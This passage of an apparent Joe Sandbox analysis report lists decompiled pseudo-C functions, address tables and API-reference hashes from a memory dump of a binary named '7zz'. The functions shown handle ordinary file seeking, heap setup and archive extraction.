			}












                                                                      0x00418402
                                                                      0x00418407
                                                                      0x00418408
                                                                      0x0041840e
                                                                      0x00418410
                                                                      0x00418413
                                                                      0x00418416
                                                                      0x0041841c
                                                                      0x00418420
                                                                      0x00418449
                                                                      0x00000000
                                                                      0x0041844b
                                                                      0x0041844b
                                                                      0x00418453
                                                                      0x00418455
                                                                      0x0041845a
                                                                      0x0041845e
                                                                      0x00418469
                                                                      0x00418460
                                                                      0x00418465
                                                                      0x00418465
                                                                      0x0041846f
                                                                      0x00418473
                                                                      0x00418484
                                                                      0x00418491
                                                                      0x00000000
                                                                      0x00418486
                                                                      0x00418486
                                                                      0x00418486
                                                                      0x00418484
                                                                      0x00418422
                                                                      0x00418422
                                                                      0x00418424
                                                                      0x0041842c
                                                                      0x00418439
                                                                      0x0041842e
                                                                      0x0041842e
                                                                      0x00418431
                                                                      0x00418431
                                                                      0x0041843f
                                                                      0x00418494
                                                                      0x004184a5
                                                                      0x004184a5
                                                                      0x004184aa
                                                                      0x004184ac
                                                                      0x004184b1
                                                                      0x004184b4
                                                                      0x004184b9
                                                                      0x004184b9
                                                                      0x004184bc
                                                                      0x004184bf
                                                                      0x004184c5
                                                                      0x004184ca
                                                                      0x004184ca
                                                                      0x004184d5
                                                                      0x004184dd

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00418402
                                                                      • GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00418604,?,00000001,?,?,?,?,?,00000000), ref: 00418486
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorH_prologLast
                                                                      • String ID:
                                                                      • API String ID: 1057991267-0
                                                                      • Opcode ID: 308fd318d4d419b36d2cf5317f0bba856b964c67d85d69ddef6ecca4757266ff
                                                                      • Instruction ID: 4421d415675076c99ccf6d41903839941164c9ea02229811d1821141610bcbe1
                                                                      • Opcode Fuzzy Hash: 308fd318d4d419b36d2cf5317f0bba856b964c67d85d69ddef6ecca4757266ff
                                                                      • Instruction Fuzzy Hash: 1F319F7190011AEFCB14DFA9C9856EEBBA1FF44304F14416FE809A3291DF384E80D76A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040BA47 Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E0040BA47(void** __ecx, long _a4, long _a8, long _a12, long* _a16) {
				long _v8;
				long _v12;
				long _t21;
				long _t22;
				long* _t23;
				void** _t27;

				_t27 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if(__ecx[1] != 0 && __ecx[1] != 0 && _a12 == 2) {
					_a4 = __ecx[2] + _a4;
					_a12 = 0;
					asm("adc [ebp+0xc], esi");
				}
				_t21 = _a4;
				_v8 = _a8;
				_v12 = _t21;
				_t22 = SetFilePointer( *_t27, _t21,  &_v8, _a12); // executed
				_v12 = _t22;
				if(_t22 != 0xffffffff || GetLastError() == 0) {
					_t23 = _a16;
					 *_t23 = _v12;
					_t23[1] = _v8;
					return 1;
				} else {
					return 0;
				}
			}









                                                                      0x0040ba47
                                                                      0x0040ba4a
                                                                      0x0040ba4b
                                                                      0x0040ba51
                                                                      0x0040ba62
                                                                      0x0040ba68
                                                                      0x0040ba6b
                                                                      0x0040ba6e
                                                                      0x0040ba75
                                                                      0x0040ba78
                                                                      0x0040ba7e
                                                                      0x0040ba85
                                                                      0x0040ba8e
                                                                      0x0040ba91
                                                                      0x0040baa1
                                                                      0x0040baa7
                                                                      0x0040baac
                                                                      0x00000000
                                                                      0x0040ba9d
                                                                      0x00000000
                                                                      0x0040ba9d

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040BA85
                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 0040BA93
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: 7436a2b139077620537afe951a30d7268c4488ead8e20398b421a651f671a27a
                                                                      • Instruction ID: 7184b7cf4ce748ed61815dc5e944d1670cffa5033586876219b28924bd56fada
                                                                      • Opcode Fuzzy Hash: 7436a2b139077620537afe951a30d7268c4488ead8e20398b421a651f671a27a
                                                                      • Instruction Fuzzy Hash: A4014474600248EFCB00CF64D44089E7BB5EF45314B24C5AAE814A7391D376DE45DF99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046EA66 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0046EA66(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x496580 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E0046E91E(_t12, _t15);
					 *0x496584 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E0046F60A();
							goto L5;
						}
					} else {
						_t10 = E0046EAC3(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x496580);
							goto L7;
						}
					}
				}
			}








                                                                      0x0046ea66
                                                                      0x0046ea77
                                                                      0x0046ea7d
                                                                      0x0046ea7f
                                                                      0x0046ea84
                                                                      0x0046eabc
                                                                      0x0046eabe
                                                                      0x0046ea86
                                                                      0x0046ea86
                                                                      0x0046ea8e
                                                                      0x0046ea93
                                                                      0x0046eaa2
                                                                      0x0046eaa5
                                                                      0x00000000
                                                                      0x0046eaa7
                                                                      0x0046eaa7
                                                                      0x00000000
                                                                      0x0046eaa7
                                                                      0x0046ea95
                                                                      0x0046ea9a
                                                                      0x0046eaac
                                                                      0x0046eaae
                                                                      0x0046eabf
                                                                      0x0046eac1
                                                                      0x0046eac2
                                                                      0x0046eab0
                                                                      0x0046eab6
                                                                      0x00000000
                                                                      0x0046eab6
                                                                      0x0046eaae
                                                                      0x0046ea93

                                                                      APIs
                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,0046CFAA,00000001), ref: 0046EA77
                                                                        • Part of subcall function 0046E91E: GetVersionExA.KERNEL32 ref: 0046E93D
                                                                      • HeapDestroy.KERNEL32 ref: 0046EAB6
                                                                        • Part of subcall function 0046EAC3: HeapAlloc.KERNEL32(00000000,00000140,0046EA9F,000003F8), ref: 0046EAD0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocCreateDestroyVersion
                                                                      • String ID:
                                                                      • API String ID: 2507506473-0
                                                                      • Opcode ID: 529c86f540b2e3f00af20ac8cc2ba51f405252cf123252289ac745e0dd2c21fe
                                                                      • Instruction ID: 6733a5d0b54313f111c3d21430f7c760d78354a0b10c30e4881add0b2ce5f3d9
                                                                      • Opcode Fuzzy Hash: 529c86f540b2e3f00af20ac8cc2ba51f405252cf123252289ac745e0dd2c21fe
                                                                      • Instruction Fuzzy Hash: 12F06D78610301AAEB205BB3AC0572A36D0BB50792F25483BF804C85E4FB6889C4A61B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004290C5 Relevance: 2.1, APIs: 1, Instructions: 563COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 87%
                                                                      			E004290C5(signed char __edx) {
				signed int _t311;
				signed char _t313;
				signed int _t315;
				signed char _t316;
				intOrPtr _t319;
				void* _t325;
				intOrPtr _t329;
				intOrPtr _t331;
				signed char _t332;
				intOrPtr _t337;
				signed char _t339;
				signed char _t344;
				intOrPtr _t345;
				signed char _t356;
				signed char _t357;
				signed char _t358;
				signed char _t361;
				signed char _t362;
				signed char _t367;
				signed char _t368;
				signed char _t369;
				signed char _t377;
				signed char _t378;
				signed char _t381;
				signed char _t382;
				signed char _t388;
				signed char _t389;
				signed char _t395;
				signed char _t397;
				signed char _t398;
				signed char _t402;
				signed char _t414;
				signed int _t422;
				intOrPtr _t430;
				intOrPtr _t439;
				signed char _t443;
				signed char _t449;
				signed char _t450;
				signed char _t451;
				signed int _t453;
				void* _t455;
				intOrPtr _t457;
				signed int _t472;
				intOrPtr _t526;
				signed char _t536;
				signed int _t538;
				intOrPtr* _t539;
				signed int _t542;
				intOrPtr _t546;
				signed char _t549;
				void* _t551;
				signed char _t552;
				signed int _t554;
				intOrPtr _t555;
				void* _t556;
				void* _t558;

				_t536 = __edx;
				_t311 = E0046B890(E00476CD8, _t556);
				_t449 = 0;
				 *(_t556 - 4) = 0;
				 *((char*)(_t556 - 0x60)) = _t311 & 0xffffff00 |  *(_t556 + 0x14) != 0x00000000;
				_t313 =  *(_t556 + 0x18);
				 *((intOrPtr*)(_t556 - 0x10)) = _t558 - 0x138;
				 *(_t556 + 0x18) = _t313;
				if(_t313 != 0) {
					 *((intOrPtr*)( *_t313 + 4))(_t313);
				}
				 *(_t556 - 4) = 1;
				 *(_t556 - 0x38) = _t449;
				 *(_t556 - 0x34) = _t449;
				 *((char*)(_t556 + 0x17)) =  *((intOrPtr*)(_t556 + 0x10)) == 0xffffffff;
				if( *((char*)(_t556 + 0x17)) != 0) {
					 *((intOrPtr*)(_t556 + 0x10)) =  *((intOrPtr*)( *(_t556 + 8) + 0xdc));
				}
				if( *((intOrPtr*)(_t556 + 0x10)) != _t449) {
					E00405B9F(_t556 - 0x30);
					 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
					_t315 = 0;
					__eflags = 0;
					 *(_t556 - 4) = 2;
					 *(_t556 - 0x18) = 0;
					while(1) {
						__eflags = _t315 -  *((intOrPtr*)(_t556 + 0x10));
						if(_t315 >=  *((intOrPtr*)(_t556 + 0x10))) {
							break;
						}
						__eflags =  *((char*)(_t556 + 0x17));
						if( *((char*)(_t556 + 0x17)) == 0) {
							_t315 =  *( *(_t556 + 0xc) + _t315 * 4);
						}
						_t544 =  *(_t556 + 8);
						 *(_t556 - 0x1c) = _t315;
						_t554 =  *( *((intOrPtr*)( *(_t556 + 8) + 0x228)) + _t315 * 4);
						__eflags = _t554 - 0xffffffff;
						if(_t554 != 0xffffffff) {
							_t422 =  *(_t556 - 0x28);
							__eflags = _t422 - _t449;
							if(_t422 == _t449) {
								L16:
								 *(_t556 - 0x90) =  *(_t556 - 0x90) | 0xffffffff;
								 *(_t556 - 0x8c) = _t554;
								E0042999D(_t556 - 0x88);
								 *(_t556 - 0x70) = _t449;
								 *(_t556 - 0x6c) = _t449;
								_push(_t556 - 0x90);
								 *(_t556 - 4) = 5;
								E004299F0(_t556 - 0x30);
								 *(_t556 - 4) = 2;
								E00408604(_t556 - 0x88);
								_t526 = E00429826( *((intOrPtr*)( *((intOrPtr*)(_t544 + 0xb8)) + _t554 * 4)));
								_t67 = _t556 - 0x38;
								 *_t67 =  *(_t556 - 0x38) + _t526;
								__eflags =  *_t67;
								_t430 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) +  *(_t556 - 0x28) * 4 - 4));
								asm("adc [ebp-0x34], edx");
								 *((intOrPtr*)(_t430 + 0x20)) = _t526;
								 *(_t430 + 0x24) = _t536;
								L17:
								_t546 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) +  *(_t556 - 0x28) * 4 - 4));
								_t457 =  *((intOrPtr*)( *((intOrPtr*)( *(_t556 + 8) + 0x214)) + _t554 * 4));
								_t555 =  *((intOrPtr*)(_t546 + 0x10));
								while(1) {
									_t435 =  *(_t556 - 0x1c) - _t457;
									__eflags = _t555 -  *(_t556 - 0x1c) - _t457;
									if(_t555 >  *(_t556 - 0x1c) - _t457) {
										goto L13;
									}
									_t87 = _t546 + 8; // 0xa
									E0043AC2F(_t87, _t435 & 0xffffff00 | __eflags == 0x00000000);
									_t555 = _t555 + 1;
								}
								goto L13;
							}
							_t439 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) + _t422 * 4 - 4));
							__eflags = _t554 -  *((intOrPtr*)(_t439 + 4));
							if(_t554 ==  *((intOrPtr*)(_t439 + 4))) {
								goto L17;
							}
							goto L16;
						} else {
							_push(_t554);
							_push(_t315);
							_push(E004298B3(_t556 - 0x144));
							 *(_t556 - 4) = 3;
							E004299F0(_t556 - 0x30);
							 *(_t556 - 4) = 2;
							E00408604(_t556 - 0x13c);
							L13:
							_t315 =  *(_t556 - 0x18) + 1;
							_t449 = 0;
							 *(_t556 - 0x18) = _t315;
							continue;
						}
					}
					_t316 =  *(_t556 + 0x18);
					__eflags =  *((intOrPtr*)( *_t316 + 0xc))(_t316,  *(_t556 - 0x38),  *(_t556 - 0x34)) - _t449;
					if(__eflags == 0) {
						E00426448(_t556 - 0x11c, __eflags, 1);
						_push(0x38);
						 *(_t556 - 4) = 7;
						 *(_t556 - 0x44) = _t449;
						 *(_t556 - 0x40) = _t449;
						 *(_t556 - 0x4c) = _t449;
						 *(_t556 - 0x48) = _t449;
						_t319 = E004079F2();
						 *((intOrPtr*)(_t556 + 0x10)) = _t319;
						__eflags = _t319 - _t449;
						 *(_t556 - 4) = 8;
						if(_t319 == _t449) {
							_t549 = 0;
							__eflags = 0;
						} else {
							_t549 = E0040F3E5(_t319);
						}
						__eflags = _t549 - _t449;
						 *(_t556 - 4) = 7;
						 *(_t556 - 0x34) = _t549;
						 *(_t556 - 0x14) = _t549;
						if(_t549 != _t449) {
							 *((intOrPtr*)( *_t549 + 4))(_t549);
						}
						_push(_t449);
						 *(_t556 - 4) = 9;
						E0040F478(_t549,  *(_t556 + 0x18));
						_t538 = 0;
						__eflags = 0;
						 *(_t556 - 0x1c) = 0;
						while(1) {
							 *(_t549 + 0x28) =  *(_t556 - 0x4c);
							 *(_t549 + 0x2c) =  *(_t556 - 0x48);
							 *(_t549 + 0x20) =  *(_t556 - 0x44);
							 *(_t549 + 0x24) =  *(_t556 - 0x40);
							_t325 = E0040F554(_t549);
							__eflags = _t325 - _t449;
							if(_t325 != _t449) {
								break;
							}
							__eflags = _t538 -  *(_t556 - 0x28);
							if(_t538 <  *(_t556 - 0x28)) {
								_push(0x38);
								 *(_t556 - 0x54) = _t449;
								 *(_t556 - 0x50) = _t449;
								_t539 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) + _t538 * 4));
								 *((intOrPtr*)(_t556 - 0x5c)) =  *((intOrPtr*)(_t539 + 0x20));
								 *((intOrPtr*)(_t556 - 0x58)) =  *((intOrPtr*)(_t539 + 0x24));
								_t329 = E004079F2();
								 *((intOrPtr*)(_t556 - 0x3c)) = _t329;
								__eflags = _t329 - _t449;
								 *(_t556 - 4) = 0xb;
								if(_t329 == _t449) {
									_t450 = 0;
									__eflags = 0;
								} else {
									_t450 = E00429F42(_t329);
								}
								__eflags = _t450;
								 *(_t556 - 0x18) = _t450;
								 *(_t556 - 4) = 9;
								 *(_t556 + 0x14) = _t450;
								if(_t450 != 0) {
									 *((intOrPtr*)( *_t450 + 4))(_t450);
								}
								 *(_t556 - 4) = 0xc;
								_t551 =  *(_t556 + 8) + 0x70;
								_t331 =  *_t539;
								__eflags = _t331 - 0xffffffff;
								if(_t331 == 0xffffffff) {
									_t331 =  *((intOrPtr*)( *((intOrPtr*)(_t551 + 0x1a4)) +  *(_t539 + 4) * 4));
								}
								__eflags =  *( *(_t556 + 8) + 0x14);
								_t332 = E0042A06F(_t450, _t551, 0, _t331, _t539 + 8,  *(_t556 + 0x18),  *((intOrPtr*)(_t556 - 0x60)),  *(_t556 + 8) & 0xffffff00 |  *( *(_t556 + 8) + 0x14) != 0x00000000); // executed
								_t451 = _t332;
								__eflags = _t451;
								if(_t451 == 0) {
									__eflags =  *_t539 - 0xffffffff;
									if( *_t539 == 0xffffffff) {
										_t453 =  *(_t539 + 4) << 2;
										 *((intOrPtr*)(_t556 - 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t551 + 0x48)) + _t453));
										 *(_t556 - 0x54) = E00429872(_t551,  *(_t539 + 4));
										 *(_t556 - 0x50) = _t536;
										_t337 =  *((intOrPtr*)(_t551 + 0x17c));
										_t542 =  *( *((intOrPtr*)(_t551 + 0x190)) + _t453) << 3;
										_t455 =  *((intOrPtr*)(_t337 + _t542)) +  *((intOrPtr*)(_t551 + 0x148));
										asm("adc eax, [esi+0x14c]");
										 *(_t556 + 0xc) =  *(_t556 + 0xc) & 0x00000000;
										 *((intOrPtr*)(_t556 - 0x64)) =  *((intOrPtr*)(_t337 + _t542 + 4));
										_t339 =  *(_t556 + 0x18);
										 *(_t556 - 4) = 0xe;
										__eflags = _t339;
										if(__eflags != 0) {
											_t536 = _t556 + 0xc;
											 *((intOrPtr*)( *_t339))(_t339, 0x47a578, _t536);
										}
										 *(_t556 - 4) = 0xf;
										_t344 = E004264F7(_t556 - 0x11c, _t536, __eflags,  *((intOrPtr*)( *(_t556 + 8) + 0x6c)), _t455,  *((intOrPtr*)(_t556 - 0x64)),  *((intOrPtr*)(_t551 + 0xc)) + _t542,  *((intOrPtr*)(_t556 - 0x3c)),  *(_t556 + 0x14),  *(_t556 - 0x14),  *(_t556 + 0xc), _t556 + 0x13, 1,  *((intOrPtr*)( *(_t556 + 8) + 0x10))); // executed
										_t552 = _t344;
										__eflags = _t552 - 1;
										if(_t552 != 1) {
											__eflags = _t552 - 0x80004001;
											if(_t552 != 0x80004001) {
												__eflags = _t552;
												if(_t552 == 0) {
													_t472 =  *(_t556 - 0x18);
													_t345 =  *((intOrPtr*)(_t472 + 0x18));
													__eflags =  *((intOrPtr*)(_t472 + 0x28)) -  *((intOrPtr*)(_t345 + 8));
													if( *((intOrPtr*)(_t472 + 0x28)) ==  *((intOrPtr*)(_t345 + 8))) {
														 *(_t556 - 4) = 0xc;
														E0043361B(_t556 + 0xc);
														 *(_t556 - 4) = 9;
														E0043361B(_t556 + 0x14);
														goto L104;
													}
													_t552 = E0042A381(_t472, _t556, 2);
													 *(_t556 - 4) = 0xc;
													__eflags = _t552;
													if(_t552 == 0) {
														E0043361B(_t556 + 0xc);
														 *(_t556 - 4) = 9;
														E0043361B(_t556 + 0x14);
														goto L101;
													}
													_t356 =  *(_t556 + 0xc);
													__eflags = _t356;
													if(_t356 != 0) {
														 *((intOrPtr*)( *_t356 + 8))(_t356);
													}
													_t357 =  *(_t556 + 0x14);
													 *(_t556 - 4) = 9;
													__eflags = _t357;
													if(_t357 != 0) {
														 *((intOrPtr*)( *_t357 + 8))(_t357);
													}
													_t358 =  *(_t556 - 0x14);
													 *(_t556 - 4) = 7;
													__eflags = _t358;
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t358 + 8))(_t358);
													}
													 *(_t556 - 4) = 2;
													E00429925(_t556 - 0x11c, __eflags);
													 *(_t556 - 4) = 1;
													E004299B8(_t556 - 0x30);
													goto L96;
												}
												_t367 =  *(_t556 + 0xc);
												 *(_t556 - 4) = 0xc;
												__eflags = _t367;
												if(_t367 != 0) {
													 *((intOrPtr*)( *_t367 + 8))(_t367);
												}
												_t368 =  *(_t556 + 0x14);
												 *(_t556 - 4) = 9;
												__eflags = _t368;
												if(_t368 != 0) {
													 *((intOrPtr*)( *_t368 + 8))(_t368);
												}
												_t369 =  *(_t556 - 0x14);
												 *(_t556 - 4) = 7;
												__eflags = _t369;
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t369 + 8))(_t369);
												}
												 *(_t556 - 4) = 2;
												E00429925(_t556 - 0x11c, __eflags);
												 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
												 *(_t556 - 4) = 0x12;
												goto L65;
											}
											_t552 = E0042A381( *(_t556 - 0x18), _t556, 1);
											_t377 =  *(_t556 + 0xc);
											__eflags = _t552;
											 *(_t556 - 4) = 0xc;
											if(_t552 == 0) {
												goto L75;
											}
											__eflags = _t377;
											if(_t377 != 0) {
												 *((intOrPtr*)( *_t377 + 8))(_t377);
											}
											_t381 =  *(_t556 + 0x14);
											 *(_t556 - 4) = 9;
											__eflags = _t381;
											if(_t381 != 0) {
												 *((intOrPtr*)( *_t381 + 8))(_t381);
											}
											_t382 =  *(_t556 - 0x14);
											 *(_t556 - 4) = 7;
											__eflags = _t382;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t382 + 8))(_t382);
											}
											 *(_t556 - 4) = 2;
											E00429925(_t556 - 0x11c, __eflags);
											 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
											 *(_t556 - 4) = 0x11;
											goto L65;
										} else {
											_t552 = E0042A381( *(_t556 - 0x18), _t556, 2);
											_t377 =  *(_t556 + 0xc);
											__eflags = _t552;
											 *(_t556 - 4) = 0xc;
											if(_t552 == 0) {
												L75:
												__eflags = _t377;
												if(_t377 != 0) {
													 *((intOrPtr*)( *_t377 + 8))(_t377);
												}
												_t378 =  *(_t556 + 0x14);
												 *(_t556 - 4) = 9;
												__eflags = _t378;
												if(_t378 != 0) {
													 *((intOrPtr*)( *_t378 + 8))(_t378);
												}
												L101:
												 *(_t556 - 4) = 9;
												L104:
												 *(_t556 - 0x1c) =  *(_t556 - 0x1c) + 1;
												 *(_t556 - 0x4c) =  *(_t556 - 0x4c) +  *((intOrPtr*)(_t556 - 0x5c));
												_t549 =  *(_t556 - 0x34);
												_t538 =  *(_t556 - 0x1c);
												asm("adc [ebp-0x48], eax");
												 *(_t556 - 0x44) =  *(_t556 - 0x44) +  *(_t556 - 0x54);
												asm("adc [ebp-0x40], eax");
												_t449 = 0;
												continue;
											}
											__eflags = _t377;
											if(_t377 != 0) {
												 *((intOrPtr*)( *_t377 + 8))(_t377);
											}
											_t388 =  *(_t556 + 0x14);
											 *(_t556 - 4) = 9;
											__eflags = _t388;
											if(_t388 != 0) {
												 *((intOrPtr*)( *_t388 + 8))(_t388);
											}
											_t389 =  *(_t556 - 0x14);
											 *(_t556 - 4) = 7;
											__eflags = _t389;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t389 + 8))(_t389);
											}
											 *(_t556 - 4) = 2;
											E00429925(_t556 - 0x11c, __eflags);
											 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
											 *(_t556 - 4) = 0x10;
											L65:
											E0040862D();
											 *(_t556 - 4) = 1;
											E00408604(_t556 - 0x30);
											L96:
											_t361 =  *(_t556 + 0x18);
											 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
											__eflags = _t361;
											L97:
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t361 + 8))(_t361);
											}
											_t362 = _t552;
											goto L105;
										}
									}
									_t395 =  *(_t556 + 0x14);
									 *(_t556 - 4) = 9;
									__eflags = _t395;
									if(_t395 != 0) {
										 *((intOrPtr*)( *_t395 + 8))(_t395);
									}
									goto L104;
								} else {
									_t397 =  *(_t556 + 0x14);
									 *(_t556 - 4) = 9;
									__eflags = _t397;
									if(_t397 != 0) {
										 *((intOrPtr*)( *_t397 + 8))(_t397);
									}
									_t398 =  *(_t556 - 0x14);
									 *(_t556 - 4) = 7;
									__eflags = _t398;
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t398 + 8))(_t398);
									}
									 *(_t556 - 4) = 2;
									E00429925(_t556 - 0x11c, __eflags);
									 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
									 *(_t556 - 4) = 0xd;
									E0040862D();
									 *(_t556 - 4) = 1;
									E00408604(_t556 - 0x30);
									_t402 =  *(_t556 + 0x18);
									 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
									__eflags = _t402;
									if(_t402 != 0) {
										 *((intOrPtr*)( *_t402 + 8))(_t402);
									}
									_t362 = _t451;
									goto L105;
								}
							}
							 *(_t556 - 4) = 7;
							E0043361B(_t556 - 0x14);
							 *(_t556 - 4) = 2;
							E00429925(_t556 - 0x11c, __eflags); // executed
							 *(_t556 - 4) = 1;
							E004299B8(_t556 - 0x30);
							_t137 = _t556 - 4;
							 *_t137 =  *(_t556 - 4) & 0x00000000;
							__eflags =  *_t137;
							E0043361B(_t556 + 0x18);
							goto L35;
						}
						_t414 =  *(_t556 - 0x14);
						 *(_t556 - 4) = 7;
						__eflags = _t414 - _t449;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t414 + 8))(_t414);
						}
						 *(_t556 - 4) = 2;
						E00429925(_t556 - 0x11c, __eflags);
						 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
						 *(_t556 - 4) = 0xa;
						L22:
						E0040862D();
						 *(_t556 - 4) = 1;
						E00408604(_t556 - 0x30);
						_t361 =  *(_t556 + 0x18);
						 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
						__eflags = _t361 - _t449;
						goto L97;
					}
					 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
					 *(_t556 - 4) = 6;
					goto L22;
				} else {
					_t443 =  *(_t556 + 0x18);
					 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
					if(_t443 != _t449) {
						 *((intOrPtr*)( *_t443 + 8))(_t443);
					}
					L35:
					_t362 = 0;
					L105:
					 *[fs:0x0] =  *((intOrPtr*)(_t556 - 0xc));
					return _t362;
				}
			}



























































                                                                      0x004290c5
                                                                      0x004290ca
                                                                      0x004290d6
                                                                      0x004290dd
                                                                      0x004290e3
                                                                      0x004290e6
                                                                      0x004290eb
                                                                      0x004290ee
                                                                      0x004290f1
                                                                      0x004290f6
                                                                      0x004290f6
                                                                      0x004290fd
                                                                      0x00429101
                                                                      0x00429104
                                                                      0x00429107
                                                                      0x0042910f
                                                                      0x0042911a
                                                                      0x0042911a
                                                                      0x00429120
                                                                      0x0042913f
                                                                      0x00429144
                                                                      0x0042914b
                                                                      0x0042914b
                                                                      0x0042914d
                                                                      0x00429151
                                                                      0x00429154
                                                                      0x00429154
                                                                      0x00429157
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042915d
                                                                      0x00429161
                                                                      0x00429166
                                                                      0x00429166
                                                                      0x00429169
                                                                      0x0042916c
                                                                      0x00429175
                                                                      0x00429178
                                                                      0x0042917b
                                                                      0x004291b1
                                                                      0x004291b4
                                                                      0x004291b6
                                                                      0x004291c4
                                                                      0x004291c4
                                                                      0x004291d1
                                                                      0x004291d7
                                                                      0x004291dc
                                                                      0x004291df
                                                                      0x004291eb
                                                                      0x004291ec
                                                                      0x004291f0
